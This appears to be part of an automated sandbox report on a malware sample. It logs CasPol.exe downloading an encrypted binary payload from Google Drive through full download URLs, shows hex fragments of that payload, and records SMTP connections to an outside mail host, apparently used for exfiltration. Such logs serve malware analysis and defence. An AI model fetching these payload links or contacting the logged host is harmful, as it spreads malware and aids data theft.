                                      Oct 26, 2023 09:03:34.372299910 CEST49725587192.168.2.11142.44.240.172
                                      Oct 26, 2023 09:03:34.491735935 CEST58749725142.44.240.172192.168.2.11
                                      Oct 26, 2023 09:03:34.530174017 CEST49725587192.168.2.11142.44.240.172
                                      Oct 26, 2023 09:03:34.650960922 CEST58749725142.44.240.172192.168.2.11
                                      Oct 26, 2023 09:03:34.660974979 CEST49725587192.168.2.11142.44.240.172
                                      Oct 26, 2023 09:03:34.778249025 CEST58749725142.44.240.172192.168.2.11
                                      Oct 26, 2023 09:03:34.778862953 CEST49725587192.168.2.11142.44.240.172
                                      Oct 26, 2023 09:03:34.895936012 CEST58749725142.44.240.172192.168.2.11
                                      Oct 26, 2023 09:03:34.896325111 CEST49725587192.168.2.11142.44.240.172
                                      Oct 26, 2023 09:03:35.014163971 CEST58749725142.44.240.172192.168.2.11
                                      Oct 26, 2023 09:03:35.014457941 CEST49725587192.168.2.11142.44.240.172
                                      Oct 26, 2023 09:03:35.133073092 CEST58749725142.44.240.172192.168.2.11
                                      Oct 26, 2023 09:03:35.133336067 CEST49725587192.168.2.11142.44.240.172
                                      Oct 26, 2023 09:03:35.267997026 CEST58749725142.44.240.172192.168.2.11
                                      Oct 26, 2023 09:03:35.268311024 CEST49725587192.168.2.11142.44.240.172
                                      Oct 26, 2023 09:03:35.387686014 CEST58749725142.44.240.172192.168.2.11
                                      Oct 26, 2023 09:03:35.388467073 CEST49725587192.168.2.11142.44.240.172
                                      Oct 26, 2023 09:03:35.388545990 CEST49725587192.168.2.11142.44.240.172
                                      Oct 26, 2023 09:03:35.388585091 CEST49725587192.168.2.11142.44.240.172
                                      Oct 26, 2023 09:03:35.388621092 CEST49725587192.168.2.11142.44.240.172
                                      Oct 26, 2023 09:03:35.507103920 CEST58749725142.44.240.172192.168.2.11
                                      Oct 26, 2023 09:03:35.549346924 CEST58749725142.44.240.172192.168.2.11
                                      Oct 26, 2023 09:03:35.924119949 CEST58749725142.44.240.172192.168.2.11
                                      Oct 26, 2023 09:03:35.977986097 CEST49725587192.168.2.11142.44.240.172

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Oct 26, 2023 09:02:42.927711010 CEST6281353192.168.2.111.1.1.1
                                      Oct 26, 2023 09:02:43.021194935 CEST53628131.1.1.1192.168.2.11
                                      Oct 26, 2023 09:03:20.482393026 CEST5339353192.168.2.111.1.1.1
                                      Oct 26, 2023 09:03:20.579853058 CEST53533931.1.1.1192.168.2.11
                                      Oct 26, 2023 09:03:22.523003101 CEST5056953192.168.2.111.1.1.1
                                      Oct 26, 2023 09:03:23.525136948 CEST5056953192.168.2.111.1.1.1
                                      Oct 26, 2023 09:03:23.702862978 CEST53505691.1.1.1192.168.2.11
                                      Oct 26, 2023 09:03:23.702882051 CEST53505691.1.1.1192.168.2.11

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                      Oct 26, 2023 09:02:42.927711010 CEST192.168.2.111.1.1.10xaf29Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                      Oct 26, 2023 09:03:20.482393026 CEST192.168.2.111.1.1.10xb79cStandard query (0)doc-04-8c-docs.googleusercontent.comA (IP address)IN (0x0001)false
                                      Oct 26, 2023 09:03:22.523003101 CEST192.168.2.111.1.1.10xb6c3Standard query (0)mail.rubasa.com.ecA (IP address)IN (0x0001)false
                                      Oct 26, 2023 09:03:23.525136948 CEST192.168.2.111.1.1.10xb6c3Standard query (0)mail.rubasa.com.ecA (IP address)IN (0x0001)false

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                      Oct 26, 2023 09:02:43.021194935 CEST1.1.1.1192.168.2.110xaf29No error (0)drive.google.com142.251.167.100A (IP address)IN (0x0001)false
                                      Oct 26, 2023 09:02:43.021194935 CEST1.1.1.1192.168.2.110xaf29No error (0)drive.google.com142.251.167.101A (IP address)IN (0x0001)false
                                      Oct 26, 2023 09:02:43.021194935 CEST1.1.1.1192.168.2.110xaf29No error (0)drive.google.com142.251.167.102A (IP address)IN (0x0001)false
                                      Oct 26, 2023 09:02:43.021194935 CEST1.1.1.1192.168.2.110xaf29No error (0)drive.google.com142.251.167.138A (IP address)IN (0x0001)false
                                      Oct 26, 2023 09:02:43.021194935 CEST1.1.1.1192.168.2.110xaf29No error (0)drive.google.com142.251.167.139A (IP address)IN (0x0001)false
                                      Oct 26, 2023 09:02:43.021194935 CEST1.1.1.1192.168.2.110xaf29No error (0)drive.google.com142.251.167.113A (IP address)IN (0x0001)false
                                      Oct 26, 2023 09:03:20.579853058 CEST1.1.1.1192.168.2.110xb79cNo error (0)doc-04-8c-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                      Oct 26, 2023 09:03:20.579853058 CEST1.1.1.1192.168.2.110xb79cNo error (0)googlehosted.l.googleusercontent.com172.253.115.132A (IP address)IN (0x0001)false
                                      Oct 26, 2023 09:03:23.702862978 CEST1.1.1.1192.168.2.110xb6c3No error (0)mail.rubasa.com.ec142.44.240.172A (IP address)IN (0x0001)false
                                      Oct 26, 2023 09:03:23.702882051 CEST1.1.1.1192.168.2.110xb6c3No error (0)mail.rubasa.com.ec142.44.240.172A (IP address)IN (0x0001)false

                                      HTTP Request Dependency Graph

                                      • drive.google.com
                                      • doc-04-8c-docs.googleusercontent.com

                                      HTTPS Proxied Packets

                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      0192.168.2.1149709142.251.167.100443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                      TimestampkBytes transferredDirectionData
                                      2023-10-26 07:02:43 UTC0OUTHEAD /uc?export=download&id=1ds7uXoiiNlQLUVaO6kg19ncffqe2gom0 HTTP/1.1
                                      Connection: Keep-Alive
                                      Accept: */*
                                      Accept-Encoding: identity
                                      User-Agent: Microsoft BITS/7.8
                                      Host: drive.google.com
                                      2023-10-26 07:02:43 UTC0INHTTP/1.1 303 See Other
                                      Content-Type: application/binary
                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                      Pragma: no-cache
                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                      Date: Thu, 26 Oct 2023 07:02:43 GMT
                                      Location: https://doc-0o-8c-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/rvhp2619odbunhme3hme1gs6rkr9fe92/1698303750000/11453474870507226654/*/1ds7uXoiiNlQLUVaO6kg19ncffqe2gom0?e=download&uuid=44ed5dd2-5454-4622-9604-6b7122aa110a
                                      Content-Length: 0
                                      Strict-Transport-Security: max-age=31536000
                                      Cross-Origin-Opener-Policy: same-origin
                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                      Content-Security-Policy: script-src 'report-sample' 'nonce-AiT7Fe7850aoXIVbnDGY7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                      Server: ESF
                                      X-XSS-Protection: 0
                                      X-Frame-Options: SAMEORIGIN
                                      X-Content-Type-Options: nosniff
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      1192.168.2.1149711142.251.167.100443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                      TimestampkBytes transferredDirectionData
                                      2023-10-26 07:02:44 UTC1OUTGET /uc?export=download&id=1ds7uXoiiNlQLUVaO6kg19ncffqe2gom0 HTTP/1.1
                                      Connection: Keep-Alive
                                      Accept: */*
                                      Accept-Encoding: identity
                                      If-Unmodified-Since: Wed, 25 Oct 2023 11:58:21 GMT
                                      User-Agent: Microsoft BITS/7.8
                                      Host: drive.google.com
                                      2023-10-26 07:02:45 UTC1INHTTP/1.1 303 See Other
                                      Content-Type: application/binary
                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                      Pragma: no-cache
                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                      Date: Thu, 26 Oct 2023 07:02:45 GMT
                                      Location: https://doc-0o-8c-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/rvhp2619odbunhme3hme1gs6rkr9fe92/1698303750000/11453474870507226654/*/1ds7uXoiiNlQLUVaO6kg19ncffqe2gom0?e=download&uuid=72efe619-6e3c-4831-bf7f-64d48d4eec5d
                                      Strict-Transport-Security: max-age=31536000
                                      Cross-Origin-Opener-Policy: same-origin
                                      Content-Security-Policy: script-src 'report-sample' 'nonce-zzfvdZTESfFzPeWIUHct-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                      Server: ESF
                                      Content-Length: 0
                                      X-XSS-Protection: 0
                                      X-Frame-Options: SAMEORIGIN
                                      X-Content-Type-Options: nosniff
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      2192.168.2.1149719142.251.167.100443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                      TimestampkBytes transferredDirectionData
                                      2023-10-26 07:02:52 UTC3OUTHEAD /uc?export=download&id=1ds7uXoiiNlQLUVaO6kg19ncffqe2gom0 HTTP/1.1
                                      Connection: Keep-Alive
                                      Accept: */*
                                      Accept-Encoding: identity
                                      User-Agent: Microsoft BITS/7.8
                                      Host: drive.google.com
                                      2023-10-26 07:02:53 UTC3INHTTP/1.1 303 See Other
                                      Content-Type: application/binary
                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                      Pragma: no-cache
                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                      Date: Thu, 26 Oct 2023 07:02:53 GMT
                                      Location: https://doc-0o-8c-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/rvhp2619odbunhme3hme1gs6rkr9fe92/1698303750000/11453474870507226654/*/1ds7uXoiiNlQLUVaO6kg19ncffqe2gom0?e=download&uuid=8677b003-28cb-48a5-b12b-8362bc470125
                                      Content-Length: 0
                                      Strict-Transport-Security: max-age=31536000
                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                      Cross-Origin-Opener-Policy: same-origin
                                      Content-Security-Policy: script-src 'report-sample' 'nonce-kxnT44DdSSeWQ3QsPRmxPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                      Server: ESF
                                      X-XSS-Protection: 0
                                      X-Frame-Options: SAMEORIGIN
                                      X-Content-Type-Options: nosniff
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      3192.168.2.1149721142.251.167.100443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                      TimestampkBytes transferredDirectionData
                                      2023-10-26 07:02:54 UTC4OUTGET /uc?export=download&id=1ds7uXoiiNlQLUVaO6kg19ncffqe2gom0 HTTP/1.1
                                      Connection: Keep-Alive
                                      Accept: */*
                                      Accept-Encoding: identity
                                      If-Unmodified-Since: Wed, 25 Oct 2023 11:58:21 GMT
                                      User-Agent: Microsoft BITS/7.8
                                      Host: drive.google.com
                                      2023-10-26 07:02:55 UTC5INHTTP/1.1 303 See Other
                                      Content-Type: application/binary
                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                      Pragma: no-cache
                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                      Date: Thu, 26 Oct 2023 07:02:54 GMT
                                      Location: https://doc-0o-8c-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/rvhp2619odbunhme3hme1gs6rkr9fe92/1698303750000/11453474870507226654/*/1ds7uXoiiNlQLUVaO6kg19ncffqe2gom0?e=download&uuid=1ff10adc-3b87-480f-bfc4-387b0ae054b4
                                      Strict-Transport-Security: max-age=31536000
                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                      Cross-Origin-Opener-Policy: same-origin
                                      Content-Security-Policy: script-src 'report-sample' 'nonce-evC8e9Rkvea_NxxHxD_2Vw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                      Server: ESF
                                      Content-Length: 0
                                      X-XSS-Protection: 0
                                      X-Frame-Options: SAMEORIGIN
                                      X-Content-Type-Options: nosniff
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      4192.168.2.1149723142.251.167.100443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                      TimestampkBytes transferredDirectionData
                                      2023-10-26 07:03:19 UTC6OUTGET /uc?export=download&id=1ctnmuSYjUQKRXgVd6uPH5tTB4-sb1zXR HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
                                      Host: drive.google.com
                                      Cache-Control: no-cache
                                      2023-10-26 07:03:20 UTC6INHTTP/1.1 303 See Other
                                      Content-Type: application/binary
                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                      Pragma: no-cache
                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                      Date: Thu, 26 Oct 2023 07:03:20 GMT
                                      Location: https://doc-04-8c-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ki4j11guteiebf6blo04mvkvk2tr7322/1698303750000/11453474870507226654/*/1ctnmuSYjUQKRXgVd6uPH5tTB4-sb1zXR?e=download&uuid=6a8fff3a-2af7-46da-ad3f-190aba55b412
                                      Strict-Transport-Security: max-age=31536000
                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                      Content-Security-Policy: script-src 'nonce-HhBD1Kvpdp0HgF0UpaV7Yw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                      Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                      Cross-Origin-Opener-Policy: same-origin
                                      Server: ESF
                                      Content-Length: 0
                                      X-XSS-Protection: 0
                                      X-Frame-Options: SAMEORIGIN
                                      X-Content-Type-Options: nosniff
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      5192.168.2.1149724172.253.115.132443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                      TimestampkBytes transferredDirectionData
                                      2023-10-26 07:03:20 UTC8OUTGET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ki4j11guteiebf6blo04mvkvk2tr7322/1698303750000/11453474870507226654/*/1ctnmuSYjUQKRXgVd6uPH5tTB4-sb1zXR?e=download&uuid=6a8fff3a-2af7-46da-ad3f-190aba55b412 HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
                                      Cache-Control: no-cache
                                      Host: doc-04-8c-docs.googleusercontent.com
                                      Connection: Keep-Alive
                                      2023-10-26 07:03:21 UTC8INHTTP/1.1 200 OK
                                      X-GUploader-UploadID: ABPtcPq6-IcejT9nZcQ4q5pZN3zACa01ZPMoXPsR3YJUovQSxJlljWk_lYTJM9LGQrEX3rWOKImaJI6GxkZ_mW7GxlsEsNqi0BNK
                                      X-Content-Type-Options: nosniff
                                      Content-Type: application/octet-stream
                                      Content-Disposition: attachment; filename="aXrNocMQApv133.bin"; filename*=UTF-8''aXrNocMQApv133.bin
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Credentials: false
                                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context
                                      Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                      Accept-Ranges: bytes
                                      Content-Length: 240192
                                      Last-Modified: Wed, 25 Oct 2023 11:57:13 GMT
                                      Date: Thu, 26 Oct 2023 07:03:21 GMT
                                      Expires: Thu, 26 Oct 2023 07:03:21 GMT
                                      Cache-Control: private, max-age=0
                                      X-Goog-Hash: crc32c=Var0yg==
                                      Server: UploadServer
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close
                                      2023-10-26 07:03:21 UTC13INData Raw: 77 70 8b 61 33 58 68 5f 98 30 fa 87 5d b8 fd b7 b1 38 f2 f5 87 c0 4a d2 e9 99 9e d9 b3 1d f6 48 a8 28 77 53 24 13 70 59 f9 4f 56 21 bb 1f 6a 35 60 ab 56 a3 d9 f8 f9 07 f3 ab 8a 78 2a e5 28 b0 d9 20 fe a0 db ef 30 87 d9 03 c3 f5 b4 c5 29 8f 19 47 79 67 f7 c5 f3 95 19 1b c9 b7 40 c2 5b 26 2f 02 17 6d bc 14 c6 f1 e3 87 77 7c 62 39 62 bd 2e 89 a7 2b db b5 ba 0e 92 3c bd aa f1 24 c5 c6 21 69 b9 8a d7 cf 45 87 1c 57 09 85 a6 42 48 54 ec b6 aa bb 26 01 72 ec b3 fc ec 40 06 4e 07 60 89 cb ca ee 9b 42 d1 c4 40 37 5f 27 f7 e3 36 2a 8b c3 38 78 5d 87 fc 36 c6 af 1c c5 22 0e 48 1a 1e 3e 48 e1 b9 e5 61 60 92 d1 a4 bb 25 cc 90 8a ee 7f c3 45 e7 3c 77 e2 33 ee 08 d6 53 4a 57 43 e5 a6 9f db 8a d1 2f aa 54 a9 8a ec a9 e8 9b d3 a2 03 48 a6 f1 3b 26 ec 6d 16 8f b7 1c bd b3
                                      Data Ascii: wpa3Xh_0]8JH(wS$pYOV!j5`Vx*( 0)Gyg@[&/mw|b9b.+<$!iEWBHT&r@N`B@7_'6*8x]6"H>Ha`%E<w3SJWC/TH;&m
                                      2023-10-26 07:03:21 UTC17INData Raw: b8 3a e6 13 7e 60 09 44 d8 d6 90 a3 bb 30 1e a3 59 44 7b 23 5d 79 00 29 7d 84 af 55 7b 34 1f e4 d5 a4 38 b9 66 b7 25 9e 49 99 8c 50 9d b1 c0 5d 31 34 d4 f0 31 86 01 33 f3 aa ad 1f 21 07 d8 7c e9 5c 7b 61 a5 4d f9 69 3e 9f 0d f5 5e 86 86 b3 d0 f9 c9 fb fb 19 8b 0b 28 50 94 be 74 4b 66 23 b0 c6 8b f7 8f 8a a4 cf c5 2c a5 c4 44 37 a8 c1 e2 38 d3 98 d0 4b d9 d6 a4 63 fa 90 43 80 3f 9e 46 4c 67 9b 31 9a 9a 23 40 18 f2 3c e8 6a a9 a3 0c 04 60 f3 e5 a5 c8 db 79 a1 fb 50 14 ce 7f 9f fa 00 de b1 41 14 e4 af b8 2c ca 31 3f 3c ab 94 33 13 e6 0d 75 cf 8c 0d bc 3d c1 28 80 12 d3 76 28 07 df 4d 6f b8 1d 41 bb 87 d2 4a d6 df 6e c0 cb 3a e1 9f 34 de f4 82 79 b8 88 6a 46 49 89 ef 41 3f 18 a8 7e e7 c3 4e bf e7 77 d8 e7 79 33 92 a2 6e c7 15 1a 88 3b 05 35 61 dc 32 c7 47 d4
                                      Data Ascii: :~`D0YD{#]y)}U{48f%IP]1413!|\{aMi>^(PtKf#,D78KcC?FLg1#@<j`yPA,1?<3u=(v(MoAJn:4yjFIA?~Nwy3n;5a2G
                                      2023-10-26 07:03:21 UTC21INData Raw: 32 6e ca 6b 56 b7 42 5e 33 65 49 8e e3 fc 2f 91 f6 36 92 3d ee 8a 3c af 4e fd 41 22 60 02 17 f6 ea 54 25 1f 67 a8 76 34 ae 9d 21 40 a0 55 0b 98 86 aa 1e 8e 4a 3c 92 d7 b6 f3 de e9 fd 3b 38 ec 4f 1f 50 a3 7a 85 98 94 bd 6b 19 6b e8 47 da b4 12 cd 07 68 64 37 4e e5 93 b5 23 2c 35 f2 08 cc 37 ef db c7 df 6a 11 43 47 52 7e b1 d2 50 d5 48 8e 6f 93 6b a6 f1 27 73 56 5b a0 9a 1d 31 9f 09 64 03 c0 66 0d 2c 67 2e c7 7c e9 5b 47 13 8d c2 7e 29 b3 47 86 f4 9a 92 22 e7 ea b2 1a 02 b8 59 ab 83 34 e8 5b fe 1b 96 b3 57 28 ab a0 20 b8 70 cb 93 87 36 90 85 32 2f 5a c6 19 71 c3 68 72 09 37 44 a8 b9 5a 4e e7 3f 8b d7 68 a1 e4 8c d5 9a da b8 6e 44 d1 51 b3 a8 40 49 83 c7 85 62 fe 8f b9 9e 53 f8 1d 90 89 c5 31 19 19 19 85 8f 80 59 30 0e e4 5f 9a 5f 06 25 84 16 53 d8 c1 ef 83
                                      Data Ascii: 2nkVB^3eI/6=<NA"`T%gv4!@UJ<;8OPzkkGhd7N#,57jCGR~PHok'sV[1df,g.|[G~)G"Y4[W( p62/Zqhr7DZN?hnDQ@IbS1Y0__%S
                                      2023-10-26 07:03:21 UTC24INData Raw: 45 89 9e 5c 9d 9c 1a 97 ba 68 e9 9e 6c 46 08 44 ec 41 81 ea 89 d0 d9 a0 6b fa 5c 1f a7 c9 c1 d0 92 9d a9 5a 52 d7 78 b4 89 5d ac 6d 4b 27 76 59 bb f4 10 37 ed a0 5d 0b bc b5 a0 6f 8f 34 51 9f 87 57 d6 61 8a 2e 00 94 fe 84 7f f6 58 c4 09 7e 4e 97 a6 38 c2 40 b4 42 4d 2b ab c8 83 b9 a6 31 62 fb 55 d5 81 7d 5f 48 f7 18 7b 84 5b 31 b2 4b 87 36 65 64 a8 29 b6 73 4b f6 6c 33 ab 2a 89 b0 85 e2 e8 bf 7a 08 dc 28 11 8a 57 b9 cd 34 c9 51 74 bd 0d f8 38 39 7e d0 73 48 43 27 5a fa 29 d2 36 c5 54 46 b3 d3 75 e8 4a 00 15 eb 47 37 87 d2 67 5f 58 f6 36 bf 87 82 75 97 6f c2 ce fe cb 3c 22 75 df 56 89 d1 16 9c f0 84 ce 7f aa 50 95 18 93 a0 b2 3e 43 1a a8 c1 2e bd 3e 98 16 1a 75 3c 96 cc 7f 89 ba ea 5b db 06 fd 7f 37 3e 4a 9b 88 f9 d9 e3 b5 ff 68 0b 8f a4 45 14 7c 0d dd 52
                                      Data Ascii: E\hlFDAk\ZRx]mK'vY7]o4QWa.X~N8@BM+1bU}_H{[1K6ed)sKl3*z(W4Qt89~sHC'Z)6TFuJG7g_X6uo<"uVP>C.>u<[7>JhE|R
